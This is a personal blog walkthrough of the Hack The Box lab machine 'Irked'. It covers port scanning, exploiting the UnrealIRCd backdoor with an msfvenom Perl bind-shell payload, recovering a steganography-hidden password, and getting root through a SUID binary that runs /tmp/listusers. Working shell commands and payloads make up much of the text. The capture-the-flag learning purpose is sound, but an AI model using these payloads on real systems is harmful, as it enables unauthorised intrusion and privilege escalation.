Irked

2020-02-23 00:00:00 +0000

irked

Nmap scan first…

nmap -sV -Pn -p- 10.10.10.117 |tee -a irked.txt

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
34238/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

searchsploit unrealirc

                                                                 
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                               |  Path                                  
                                                             | (/usr/share/exploitdb/)                
--------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow      | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute               | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                    | exploits/windows/dos/27407.pl
-------------------------------------------------------------- ----------------------------------------

Searchsploit’s results show a Backdoor Command Execution available via Metasploit. Metasploit is an amazingly powerfull framework, but its use is restricted to 1 occasion in the OSCP exam, so its a good idea to investigate other avenues first.

I find an exploit tutorial here which uses msfvenom, but foregoes the use of msfconsole…this might be worth a try.

First we use msfvenom to craft a bind-shell


msfvenom -p cmd/unix/bind_perl lhost=10.10.10.117 lport=443

The walthrough doesn’t specify a port, so the default 4444 is chosen, but I’ve come across HTB machines with defences that block that port previously, so avoid it if possible, preferring to use ports that the target might consider ‘safe’ but is unused.

Msfvenom produces this…


perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,6969,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'

following the guide, I connect to the target on one of its IRC ports then before the authentication/identification can complete I insert the perl payload after entering AB;


root@kali:~/HTB/vip/irked# nc -vn 10.10.10.117 8067
(UNKNOWN) [10.10.10.117] 8067 (?) open
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,6969,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
:irked.htb 451 AB;perl :You have not registered
ERROR :Closing Link: [10.10.14.16] (Ping timeout)

before the Ping timeout I connect to the target on port 6969 with netcat…


nc -nv 10.10.10.117 6969

and get a shell…I improve the shell immediately with a python command…


python -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$

Great!!!

Privilege Escalation

1st lets find out what operating system we’re dealing with…


ircd@irked:~/Unreal3.2$ uname -a
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

Having a quick poke around, we find the user.txt in djmardov’s Documents folder.


ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We can’t read it yet, but we can read the hidden .backup file…looks like instructions for a games-console cheat !!! “steg backup pw”…sounds like the user has hidden something interesting with steghide and secured it with this password!

But what??? I realise that I haven’t even looked at the web port 80 yet! In firefox I browse to it, and find a picture of a cross smiley-face…irked is an apt description…viewing the image I see that it’s called Irked.jpg Steghide can be used to hide information in image files, so I save the image and investigate further.

steghide info irked.jpg


"irked.jpg":
  format: jpeg
  capacity: 1.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "pass.txt":
    size: 17.0 Byte
#    encrypted: rijndael-128, cbc
    compressed: yes

We can see that there is indeed something encrypted in this image, with a passphrase protection.

steghide extract -sf irked.jpg

The password found earlier is used here…


Enter passphrase: 
wrote extracted data to "pass.txt".
root@kali:~/HTB/vip/irked# ls
irc.pl  irked.jpg  irk.txt  pass.txt
root@kali:~/HTB/vip/irked# cat pass.txt
##   Kab6h+m+bbp2J:HG
root@kali:~/HTB/vip/irked#

Is this djmardov’s password???


ircd@irked:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG

Yes it is!!!


djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4axxxxxxxxxxxxxxxxxxxxxxxxxxxx8e

On to Root!

One of the first commands I always run is sudo -l


djmardov@irked:~/Documents$ sudo -l
sudo -l
bash: sudo: command not found

No sudo available on this box it seems…


ircd@irked:/home/djmardov/Documents$ find / -perm -u=s -type f 2>/dev/null

We’re looking here for suid files that perhaps we can exploit to get root…


find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

Viewuser seems like an interesting place to start,


djmardov@irked:~/Documents$ ls -la /usr/bin/viewuser
ls -la /usr/bin/viewuser
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
djmardov@irked:~/Documents$

First I use cat /usr/bin/viewuser, Identify the file as ELF executable (I should have used file /usr/bin/viewuser first) Hopefully I can have a better look with the strings command…if available.


djmardov@irked:~/Documents$ strings /usr/bin/viewuser



strings /usr/bin/viewuser
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.1.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers
;*2$"
GCC: (Debian 7.2.0-8) 7.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6586
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
viewuser.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
_edata
__x86.get_pc_thunk.dx
__cxa_finalize@@GLIBC_2.1.3
__data_start
puts@@GLIBC_2.0
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_fp_hw
__bss_start
main
setuid@@GLIBC_2.0
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

its looking for a file in /tmp folder called listusers…

we can run it to test…


djmardov@irked:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-08-10 15:07 (:0)
sh: 1: /tmp/listusers: not found

Perhaps we can create a malicious /tmp/listusers file…


djmardov@irked:~/Documents$ echo '/bin/sh' >/tmp/listusers
echo '/bin/sh' >/tmp/listusers
djmardov@irked:~/Documents$ 
djmardov@irked:~/Documents$ chmod 777 /tmp/listusers
chmod 777 /tmp/listusers

Now we’ve got a /tmp/listusers file thats executable, and will just invoke a sh shell. Lets execute viewusers again…


djmardov@irked:~/Documents$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-02-23 09:24 (:0)
# whoami
whoami
root

Now grab root flag!!!


# cd /root
cd /root
# ls
ls
pass.txt  root.txt
# cat root.txt
cat root.txt
8dxxxxxxxxxxxxxxxxxxxxxxxxxxxxf3

:)

me

My name is sh1n0bi,Welcome to my blog! Im currently writing up some HTB walkthroughs

Posts: